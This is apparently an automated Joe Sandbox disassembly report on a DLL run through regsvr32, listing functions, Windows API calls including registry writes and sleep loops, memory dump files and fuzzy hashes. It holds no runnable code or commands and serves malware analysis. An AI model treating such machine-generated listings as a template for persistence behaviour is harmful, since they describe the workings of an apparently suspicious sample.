                                                                  • Instruction ID: 54eb170c85a8f54738043b84adf5698c859832725c14c3163677b579f12d58ad
                                                                  • Opcode Fuzzy Hash: 6fae7ea3824f581ea6d227adc872b497279036be2c0aae54b70c385544ee28b6
                                                                  • Instruction Fuzzy Hash: 4211E9B29022156BEB2096AD5E449EFB29CAFA111CF510934EC14F7B01EB78CD0981F3
                                                                  Function 6C8A68A0 Relevance: 10.4, APIs: 8, Instructions: 369COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 6C8A6140: memcpy.MSVCRT(?,?,00000404), ref: 6C8A6275
                                                                  • memcpy.MSVCRT(?,?,00000408), ref: 6C8A68F3
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A699A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6A3A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6ADA
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6B7A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6C1A
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6CBA
                                                                  • memcpy.MSVCRT(?,00000000,00000408), ref: 6C8A6D56
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy
                                                                  • String ID:
                                                                  • API String ID: 3510742995-0
                                                                  • Opcode ID: 53365d4b4b8d99eb170c4abb3071092a4bec8040746d4f892d840d5623b3b803
                                                                  • Instruction ID: 29be121dff3f8b60964de6edd74427179a57fd41fa9e01faf07dcf754a7e4c1b
                                                                  • Opcode Fuzzy Hash: 53365d4b4b8d99eb170c4abb3071092a4bec8040746d4f892d840d5623b3b803
                                                                  • Instruction Fuzzy Hash: 1BE1B872D01A1D9BCB21CF68CD415EFB3B5FF4A389F144658E91977201D731AA4ACBA0
                                                                  Function 6C903CE0 Relevance: 10.2, APIs: 8, Instructions: 153COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,00000000,?,00000000,00000000,?,6C8EAD6B,00000000,?,6C8F53E6), ref: 6C903CF9
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,6C8F53E6), ref: 6C903D56
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,6C8F53E6), ref: 6C903D62
                                                                  • TlsGetValue.KERNEL32(00000000,6C8F53E6), ref: 6C903D93
                                                                  • TlsGetValue.KERNEL32(-00000001,00000000,00000000,00000000,00000000,?,00000004,0000000C,?,00000000,6C8F53E6), ref: 6C903DC5
                                                                  • TlsGetValue.KERNEL32(00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903DE7
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E38
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000,?,00000000,0000000C,?,00000000,6C8F53E6), ref: 6C903E41
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: 3f41d1548ad7689dc379ca40caa105f1b5c847d26d3cb7c3287144f0a7a986a3
                                                                  • Instruction ID: c4ec0c9aadbaa37f386ac6b8f088b797b069dbe1f9c8849b5509be279884b168
                                                                  • Opcode Fuzzy Hash: 3f41d1548ad7689dc379ca40caa105f1b5c847d26d3cb7c3287144f0a7a986a3
                                                                  • Instruction Fuzzy Hash: B7414879701611AFE7104B788C40FAB7AADBF92A58F14453EEA08C7B41EBB1D814C6B1
                                                                  Function 02635A30 Relevance: 9.2, APIs: 6, Instructions: 227timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,026491B4,00000000,?,00000000,026361A0,00000000), ref: 02635A75
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(026363A0,00000000), ref: 02635C6F
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(026363B8,00000000), ref: 02635C90
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(02636300,00000000), ref: 02635B14
                                                                    • Part of subcall function 02631280: __CxxThrowException@8.LIBCMT ref: 02631290
                                                                    • Part of subcall function 02631280: RtlDeleteCriticalSection.NTDLL(00000000), ref: 026312A1
                                                                  • InterlockedExchange.KERNEL32(026361B8,00000000), ref: 02635D01
                                                                  • timeGetTime.WINMM ref: 02635D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountInitializeSpin$CreateDeleteEventException@8ExchangeInterlockedThrowTimetime
                                                                  • String ID:
                                                                  • API String ID: 2093779962-0
                                                                  • Opcode ID: 8672cec46af8d49efd9b81af274ef302f62f6ba3e7b3b38774ed336931d610ec
                                                                  • Instruction ID: da7cf0bbe77ae72cd9d4dfc49ab873426b51391d2e217b4bd9e436d0530b0521
                                                                  • Opcode Fuzzy Hash: 8672cec46af8d49efd9b81af274ef302f62f6ba3e7b3b38774ed336931d610ec
                                                                  • Instruction Fuzzy Hash: FFA102B0A01B46AFD315DF6AC88479AFBE8FB08304F90462EE16DC7640D774A964CF94
                                                                  Function 6C946460 Relevance: 9.2, APIs: 6, Instructions: 183COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: strlen
                                                                  • String ID:
                                                                  • API String ID: 39653677-0
                                                                  • Opcode ID: c6149b8d1d5a460f3d99e611d74cf83ab812297ec4b6ba662c9854c5f5f10f99
                                                                  • Instruction ID: f6ee16f63be93efdf47bb246b5ee6e964bd5422c557f5149c0c85c375626280b
                                                                  • Opcode Fuzzy Hash: c6149b8d1d5a460f3d99e611d74cf83ab812297ec4b6ba662c9854c5f5f10f99
                                                                  • Instruction Fuzzy Hash: 63616AB15093088FC710CF19C08075ABBE8BF99708F44CA5EE898DBB59E734D94ACB56
                                                                  Function 6C86F180 Relevance: 9.2, APIs: 6, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsGetValue.KERNEL32(-00000001,00000004,00000008,?,00000000,6C86BEF3), ref: 6C86F198
                                                                  • TlsGetValue.KERNEL32(00000000), ref: 6C86F219
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,00000000), ref: 6C86F225
                                                                  • TlsGetValue.KERNEL32(00000000,?,00000004,00000008,?,00000000,6C86BEF3), ref: 6C86F256
                                                                  • memset.MSVCRT ref: 6C86F299
                                                                  • RtlGetVersion.NTDLL ref: 6C86F2B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$Versionmemset
                                                                  • String ID:
                                                                  • API String ID: 1111070192-0
                                                                  • Opcode ID: 1618c282659745b33c8edb6061f6d6d4dac115545f7ecd91b69ab7fd22f47f94
                                                                  • Instruction ID: 49988fe6ceed7ed6f7c2e4812d1005e3fc94c0fa11ce8f2d173a2225998507b3
                                                                  • Opcode Fuzzy Hash: 1618c282659745b33c8edb6061f6d6d4dac115545f7ecd91b69ab7fd22f47f94
                                                                  • Instruction Fuzzy Hash: 635166759007189FD721CF69CD01BEABBF4AF66354F004969E9489BB82DB70D904CBE1
                                                                  Function 6C8F33E0 Relevance: 9.1, APIs: 6, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CancelIo.KERNEL32(?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131,00000002,000000FF,00000000,000000FF), ref: 6C8F33F7
                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131), ref: 6C8F3412
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131,00000002,000000FF,00000000,000000FF), ref: 6C8F342C
                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,?,?,?,?,?,?,6C8B0DED,?,6C8E5C1A,?,?,6C8F3131), ref: 6C8F3485
                                                                  • CompareStringOrdinal.KERNEL32(?,?,?,?,00000001), ref: 6C8F34DC
                                                                  • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 6C8F34F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CancelCompareOrdinalOverlappedResultString
                                                                  • String ID:
                                                                  • API String ID: 2757005218-0
                                                                  • Opcode ID: 94cff528b827a2c442f38e70b7c1655139bb57437f2a65510f272e86c20c9efc
                                                                  • Instruction ID: bc003968c9ae328ab2e0ce2c9c5350c33192897219550af6802ea3938d95d245
                                                                  • Opcode Fuzzy Hash: 94cff528b827a2c442f38e70b7c1655139bb57437f2a65510f272e86c20c9efc
                                                                  • Instruction Fuzzy Hash: F6410371800208AFDB21CF60CC44BEBBBB8BF65308F144858E954AB751D775D949CBA2
                                                                  Function 6C8D2380 Relevance: 9.1, APIs: 6, Instructions: 127timesleepsynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateWaitableTimerExW.KERNEL32(00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D23AA
                                                                  • SetWaitableTimer.KERNEL32(00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000), ref: 6C8D2417
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE), ref: 6C8D2423
                                                                  • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,00000002,00000000,00000000,00000000,00000000,?,00000000,00000000,00000002,001F0003,00000000), ref: 6C8D242B
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000002,001F0003,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D243F
                                                                  • Sleep.KERNEL32(FFFFFFFF,00000000,?,6C8762AE,00000000,00000000,00989680,?,?,?), ref: 6C8D24B9
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleTimerWaitable$CreateObjectSingleSleepWait
                                                                  • String ID:
                                                                  • API String ID: 2261246915-0
                                                                  • Opcode ID: 0d7440184b0ef466ce1b8e6d27c7e0898a32ff8a16c81bd845074420544aa09b
                                                                  • Instruction ID: 2554a8414900201b9fb3b5b8730eb65a5890a094aac0d854b72c639489ffb62e
                                                                  • Opcode Fuzzy Hash: 0d7440184b0ef466ce1b8e6d27c7e0898a32ff8a16c81bd845074420544aa09b
                                                                  • Instruction Fuzzy Hash: 0F31043231030417DB18997D8D817AF66DB5F98720F9ACA38BD28DBBD0EA78EC054391
                                                                  Function 026352C0 Relevance: 9.1, APIs: 6, Instructions: 123registrysleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,02647554,00000000,00000102,?), ref: 02635392
                                                                  • RegDeleteValueW.ADVAPI32(?,02647568), ref: 026353A2
                                                                  • RegSetValueExW.ADVAPI32(?,02647568,00000000,00000003,0264C7D8,000012A0), ref: 026353C0
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026353CB
                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0263542B
                                                                  • Sleep.KERNEL32(00000BB8), ref: 02635444
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 4289506047-0
                                                                  • Opcode ID: bfd313611d1c9a55515b64e731cf7e512348cf3521115c19c06a5aacffb4c5a2
                                                                  • Instruction ID: a08fa3408557d1ff9233e76fd501678a0904c04ceab882cc6f7bb56dbc9f0a80
                                                                  • Opcode Fuzzy Hash: bfd313611d1c9a55515b64e731cf7e512348cf3521115c19c06a5aacffb4c5a2
                                                                  • Instruction Fuzzy Hash: 95414872A842808BE31B8B308805F7ABBE5AB5D718FDD1849E0C79B242E770D542C796
                                                                  Function 6C851020 Relevance: 9.1, APIs: 6, Instructions: 108sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(?,?,?,6C8512C1,?,?,?,?,?,?,6C8513CE), ref: 6C851057
                                                                  • _amsg_exit.MSVCRT ref: 6C851085
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep_amsg_exit
                                                                  • String ID:
                                                                  • API String ID: 1015461914-0
                                                                  • Opcode ID: 5bcdcdc1b8635cc844afeb3651bfc997d5e18f3a348aa94327dc19d1ea512a96
                                                                  • Instruction ID: f7a12aef1ebfca1d3fc73948853c4fd589d91154303bdfe1ac0bac6f1c706e29
                                                                  • Opcode Fuzzy Hash: 5bcdcdc1b8635cc844afeb3651bfc997d5e18f3a348aa94327dc19d1ea512a96
                                                                  • Instruction Fuzzy Hash: C241A27270D250CBE760AF6DC68571A77F0EB52348FA08A2DD4448BB14DBB6C594CB93
                                                                  Function 02635070 Relevance: 9.1, APIs: 6, Instructions: 107networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 026350BA
                                                                  • WSASetLastError.WS2_32(0000139F), ref: 026350D2
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 026350DC
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeave
                                                                  • String ID:
                                                                  • API String ID: 4082018349-0
                                                                  • Opcode ID: 544160dbc93482bff54cb37f47907fa46f018ae5eb68542a8c4220bc47cff82d
                                                                  • Instruction ID: 29c5c51af77b52be9e18cc0fc904b61cf9625a7cdf5a92e42252129d899b4a94
                                                                  • Opcode Fuzzy Hash: 544160dbc93482bff54cb37f47907fa46f018ae5eb68542a8c4220bc47cff82d
                                                                  • Instruction Fuzzy Hash: F2319C7AA44684ABD721CF94D985B6AB3E9FB48714F404A1EFD16C7780DB36E810CB90
                                                                  Function 026352E9 Relevance: 9.1, APIs: 6, Instructions: 84registrysleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,02647554,00000000,00000102,?), ref: 02635392
                                                                  • RegDeleteValueW.ADVAPI32(?,02647568), ref: 026353A2
                                                                  • RegSetValueExW.ADVAPI32(?,02647568,00000000,00000003,0264C7D8,000012A0), ref: 026353C0
                                                                  • RegCloseKey.ADVAPI32(?), ref: 026353CB
                                                                  • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0263542B
                                                                  • Sleep.KERNEL32(00000BB8), ref: 02635444
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$CloseCodeDeleteExitOpenProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 4289506047-0
                                                                  • Opcode ID: 27bcfcb238d7b4a451c09d35018a480c39ebc26e215a2b4ea17bf0cce4cd3608
                                                                  • Instruction ID: 4661aba7132f060307853a64b726b3611fd654c3cfea632a2ccab6fcadf20068
                                                                  • Opcode Fuzzy Hash: 27bcfcb238d7b4a451c09d35018a480c39ebc26e215a2b4ea17bf0cce4cd3608
                                                                  • Instruction Fuzzy Hash: BC3190346883809FE72BCB308848F79BBE5AB59708FDD1849E1CB9B242D770D556C792
                                                                  Function 0263D9FE Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0263DA0A
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __amsg_exit.LIBCMT ref: 0263DA2A
                                                                  • __lock.LIBCMT ref: 0263DA3A
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0263DA57
                                                                  • _free.LIBCMT ref: 0263DA6A
                                                                  • InterlockedIncrement.KERNEL32(02649B48), ref: 0263DA82
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 3470314060-0
                                                                  • Opcode ID: 13b0648aec74904f729657ef5f661e401ee402a116373ec5155bd4b52c920e1e
                                                                  • Instruction ID: b11b14ca7ea0def0a709073198ddd34fb4cf2f34c3e4e8b61c434a951ed2aa35
                                                                  • Opcode Fuzzy Hash: 13b0648aec74904f729657ef5f661e401ee402a116373ec5155bd4b52c920e1e
                                                                  • Instruction Fuzzy Hash: 1801D275D8A721ABD723AF74D50479EB3E1BF00721F044509E88163380CB74A591DFD9
                                                                  Function 6C894A50 Relevance: 9.0, APIs: 7, Instructions: 253COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 6C894A6D
                                                                  • memcpy.MSVCRT(?,?,00000404), ref: 6C894AB7
                                                                  • memcpy.MSVCRT(00000400,?,00000404,?,?,?,?,?,00000400,6C97DC4C), ref: 6C894B2F
                                                                  • memcpy.MSVCRT(00000400,?,00000404,00000000,?,?,00000400,6C97DC1C,?,?,00000400,6C97DC0C,?,?,00000400,6C97DC4C), ref: 6C894C07
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$memset
                                                                  • String ID:
                                                                  • API String ID: 438689982-0
                                                                  • Opcode ID: b2012acf837a6cbba83fbdc790be1a39b8d21366b24825634bf2710d7d4fc645
                                                                  • Instruction ID: e721bd4413f0f7b69cb07aa76ff2c4124a060ca9c50e899245f2ae8733bc6f25
                                                                  • Opcode Fuzzy Hash: b2012acf837a6cbba83fbdc790be1a39b8d21366b24825634bf2710d7d4fc645
                                                                  • Instruction Fuzzy Hash: 88813AB16012246FD7205A58DC80FFA77A9EFD171DF088479FB487BB82C370A9068798
                                                                  Function 6C8F8EB0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8EC3
                                                                  • GetLastError.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,00000000,00000001,?,?,6C8DC9EC,00000001,00000000,?), ref: 6C8F8ED1
                                                                  • GetConsoleMode.KERNEL32(00000000,00000000,FFFFFFF4), ref: 6C8F8F06
                                                                  • CloseHandle.KERNEL32(6C8DC9EC,00000000,6C983D58,called `Result::unwrap()` on an `Err` value,0000002B,00000000,6C9806DC,6C983CE4,?,00000001,6C983CD4,00000000,00000000,FFFFFFF4), ref: 6C8F9163
                                                                  Strings
                                                                  • called `Result::unwrap()` on an `Err` value, xrefs: 6C8F9139
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
